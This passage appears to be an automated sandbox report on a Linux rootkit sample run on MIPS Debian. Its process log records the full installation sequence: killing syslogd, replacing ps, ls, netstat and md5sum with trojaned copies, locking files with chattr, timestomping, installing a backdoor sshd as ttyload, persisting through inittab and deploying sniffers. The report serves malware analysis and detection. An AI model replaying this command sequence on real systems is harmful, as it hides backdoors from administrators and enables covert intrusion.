SHA1 8daa48f1b0d9fe0f5204e5fbe53219ec3bd6bfe4
SHA256 18883af5bb7d532b29d96a5f574180b69a2e717cec2d9bdb7281121b0c7b88a6
SHA512 67ab595bdaa10dc47ea3cb479d3a4741eef538e4088726bb9e64988234d9a5cf9d0df876e1ebbd00fb79615e1aefeb8006bba4026a76e03f75aa5f3039d12f49

/tmp/.shmd5

MD5 dc1735d96a90ff69ba41bf58c3bc2f39
SHA1 b5cbca6a62f9acb5c098f8f86a24f91412fa394d
SHA256 7a8ab94bbac31a0f8ccbb76d7be88081936d23850927e34d75fc0c2e9b7d0f24
SHA512 b176b66ff17fed27df65261beb14a1539079bf36e8bebcce894852296612088f0bcc69ad6d153936060289a35f3408a65b44578fd62b1da7db724808398ca0f6

/tmp/.shmd5

MD5 857c3956d4a1a4582e141faffb4b1779
SHA1 e8a492beb7474ec753feb22218ec80ef225fba48
SHA256 240ff5077cf70e5bdd3db05117b6616220b5fb640204e7f09098ba2533bb71b1
SHA512 8dd66b41ae1cf9779ddeac7d6ec965e505632c5d68151a029d349416930953f900959aba8b2f77d4a2477140ed3ec3422c9fa43d164efb12ca6cca465711b2a3

/tmp/.shmd5

MD5 fa8d0415321078ae192da3f4126ecce8
SHA1 75cf9b5aecb0801f6a4d9f5b9a7b8276c6f72cb3
SHA256 b0a80b13087310fd54ff6ae57345a499cbb2b3fa2b0e6dd0e5cbe5c63bc3b21d
SHA512 941c83e63e1fbd481a2928a0e1f4e02deec4434989d7b28796203d5417de9a0fe7adee44d857136dbb0961209ef349ad6667600a83a8fc6949dda138aea1cc87

/tmp/.shmd5

MD5 d1220027882f8ccaf610795654f25b77
SHA1 e03d19c941c886cfc84e0644acf4ca65647c2b92
SHA256 93163ae54ecefea14f7c701c15e9c909582036b8fd8f61a94ff3c91dd90bf0de
SHA512 3b4cde3abc06e2d571fac45d3f270e944e8ef235e5fa7a8eb7b16163f6c6f9624484e637fe2373d869a553e1c5786dbe8150abc4f317347aa569782d3aef47a4

/usr/lib/libsh/.backup/ps

MD5 c93283a1ee71686a4c9c1a58495d61aa
SHA1 e3a549212766c446f419cb20b627406a7c9cb372
SHA256 5268d4cdcb0b1988dd8e1a549d3f68af322242ed05f0d7d46f263590fe138f95
SHA512 0306a45375926837688073f0408e11a9236c143381aa9fd98c998feb523daa1f1f7ca1cb27ac3c62749b53149115315bba3527f06ef873e9416cd7a68537fcf5

/usr/lib/libsh/.backup/top

MD5 16f0b6ac13b75fb60b9177800b730cc0
SHA1 601e899aa19be08acc6965a17013807465757b9b
SHA256 55d4baa5703049edd1091ab97e845ffa50af06427480c09637219751ab7517b2
SHA512 f94d34cf451053146736a13cfb3d1b93ea22660544baa495e828f7d7dc01276bfcff8985cc35035b672655efcbf1607cdcd879ffe4ffe311b406ca22cc70df47

/usr/lib/libsh/.backup/ls

MD5 fd8041181f67149d6b84bed1401c0f3b
SHA1 6824b1ee73a9f50a97369a674a009ec687a09cff
SHA256 e83717a87080eae8bd6772e08fe4b83c54cc1c5672cc02edf0e60de227118a95
SHA512 a58ab85e69dd41f4c8d79c07eede01e240d0201957a96a386a6256a1474852fde4dce850f0237e664812a03801e57a50fa70a4b0da05e6ab65d1fae2e6277a75

/usr/lib/libsh/.backup/find

MD5 138a27d6fe52fa1132760a4fa48922e0
SHA1 e0250e4d7bf33a5a1064344224148b889cb15138
SHA256 81a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa
SHA512 ee0078afad63fc2aaffdebb7127d1c7d4459287fee75358f57c82d397c39b7bf64338fb6996dfb1747cd9a896d714b3c76f0948727be91550f1affa1c0298a9e

/usr/lib/libsh/.backup/pstree

MD5 d326548ef8d6a8cb14b495115c6e9c73
SHA1 fee8b30669dc67e207bf6fcb2d36838f65a5c69a
SHA256 8af3af6bf27f219619ca657f86e124fb5ee85d779df8af79a78eaf19a930224b
SHA512 a5b6b1744da59b5531dd644ee318febd7588a7e0e8aa8b4543106ef0b00a4318a8fe2e6bd11c7ca85be61e59c9ff5643067e076ff9af19f4d1c663d7e3408c57

/usr/lib/libsh/.backup/md5sum

MD5 8e89133057a1152e19e05fcfd5034aae
SHA1 94301c22a1137deef4797a26eb04a4f68b814d96
SHA256 7eb9347d691bea01ec8fcce0f055d0b94e36a9615bc69c203f764540b32047eb
SHA512 f43d2b23033ff34d6bd9dfcb3a88a45fd59195638961b5192be4fc0d4d8304520e870bea1c9689f1ce1c84506b5e1f296a88961d1c88fca0a62d52cddffb0700

/tmp/.procs

MD5 aef0778609d12066a26732722ab63f42
SHA1 f6d97eaa94003ea3f70907c9d4a3fb50ffb57525
SHA256 eca3253479966699a6377c78df0e2934915e571658fa3b5788230582d9c3d8ae
SHA512 2925512da6c5728fb73e62d88cc9f8da9377be2d396d69d181e532730f3daebf188cd70818bb27003960e7d26904bec5b18240fde40d711ca89da3650ed8f69e

/tmp/info_tmp

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

debian9-mipsbe-20240611-en

Max time kernel

72s

Max time network

73s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/704/stat /usr/bin/killall N/A
File opened for reading /proc/345/stat /bin/pidof N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/6/stat /bin/ps N/A
File opened for reading /proc/402/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/146/stat /usr/bin/killall N/A
File opened for reading /proc/310/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/886/cmdline /usr/bin/killall N/A
File opened for reading /proc/72/cmdline /bin/ps N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/532/stat /usr/bin/killall N/A
File opened for reading /proc/313/stat /bin/pidof N/A
File opened for reading /proc/371/cmdline /bin/ps N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/383/stat /usr/bin/killall N/A
File opened for reading /proc/145/stat /usr/bin/killall N/A
File opened for reading /proc/371/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/799/stat /bin/pidof N/A
File opened for reading /proc/708/stat /bin/ps N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/146/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/496/stat /usr/bin/killall N/A
File opened for reading /proc/371/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/913/stat /bin/ps N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/223/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /bin/ps N/A
File opened for reading /proc/483/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/483/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /bin/pidof N/A
File opened for reading /proc/146/stat /bin/pidof N/A
File opened for reading /proc/312/status /bin/ps N/A
File opened for reading /proc/345/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /bin/pidof N/A
File opened for reading /proc/75/stat /bin/ps N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/372/cmdline /bin/pidof N/A
File opened for reading /proc/496/stat /usr/bin/killall N/A
File opened for reading /proc/114/cmdline /usr/bin/killall N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/78/cmdline /bin/pidof N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/bin/grep

[grep -v ^$]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/grep

[grep @]

/usr/bin/cut

[cut -d @ -f 2]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

[mkdir /lib/libsh.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v ttyload]

/bin/grep

[grep -v getty]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/rm

[rm -rf /tmp/.procs]

/bin/cat

[cat /tmp/.stats]

/bin/grep

[grep 443]

/bin/grep

[grep http]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/grep

[grep inet addr:]

/usr/bin/awk

[awk -F {print $2} ]

/usr/bin/cut

[cut -c6-]

/bin/hostname

[hostname -f]

/bin/uname

[uname -a]

/usr/bin/awk

[awk { print $11 }]

/bin/cat

[cat /tmp/info_tmp]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/usr/bin/awk

[awk {print $3}]

/bin/hostname

[hostname -i]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep eth]

/usr/bin/wc

[wc -l]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 20 - 21]

/sbin/iptables

[/sbin/iptables -L input]

/usr/bin/head

[head -5]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp

Files

/var/cache/ldconfig/aux-cache~

/lib/libsh.so/bash

/tmp/.init1

/tmp/.init1

/tmp/.init1

/tmp/.init1

/tmp/.init1

/usr/sbin/ttyload

/usr/sbin/ttyload

/tmp/.shmd5

/tmp/.shmd5

/tmp/.shmd5

/tmp/.shmd5

/tmp/.shmd5

/usr/lib/libsh/.backup/ps

/usr/lib/libsh/.backup/top

/usr/lib/libsh/.backup/ls

/usr/lib/libsh/.backup/find

/usr/lib/libsh/.backup/pstree

/usr/lib/libsh/.backup/md5sum

/tmp/.procs

/tmp/info_tmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

debian9-mipsel-20240611-en

Max time kernel

39s

Max time network

40s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/801/cmdline /bin/pidof N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/154/cmdline /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/681/stat /usr/bin/killall N/A
File opened for reading /proc/857/cmdline /usr/bin/killall N/A
File opened for reading /proc/713/stat /bin/ps N/A
File opened for reading /proc/669/stat /bin/pidof N/A
File opened for reading /proc/232/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/339/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /bin/pidof N/A
File opened for reading /proc/857/cmdline /bin/ps N/A
File opened for reading /proc/334/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/22/cmdline /bin/ps N/A
File opened for reading /proc/339/stat /bin/ps N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /bin/ps N/A
File opened for reading /proc/15/stat /bin/ps N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /bin/pidof N/A
File opened for reading /proc/73/stat /bin/pidof N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/435/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /bin/pidof N/A
File opened for reading /proc/383/stat /usr/bin/killall N/A
File opened for reading /proc/435/stat /usr/bin/killall N/A
File opened for reading /proc/886/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/811/stat /bin/pidof N/A
File opened for reading /proc/332/cmdline /bin/ps N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/703/cmdline /bin/pidof N/A
File opened for reading /proc/177/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/6/cmdline /bin/pidof N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /bin/pidof N/A
File opened for reading /proc/36/stat /bin/pidof N/A
File opened for reading /proc/337/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/711/cmdline /bin/ps N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/710/stat /bin/ps N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/2/stat /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/grep

[grep -v ^$]

/bin/grep

[grep @]

/usr/bin/cut

[cut -d @ -f 2]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

[mkdir /lib/libsh.so]

/usr/bin/touch

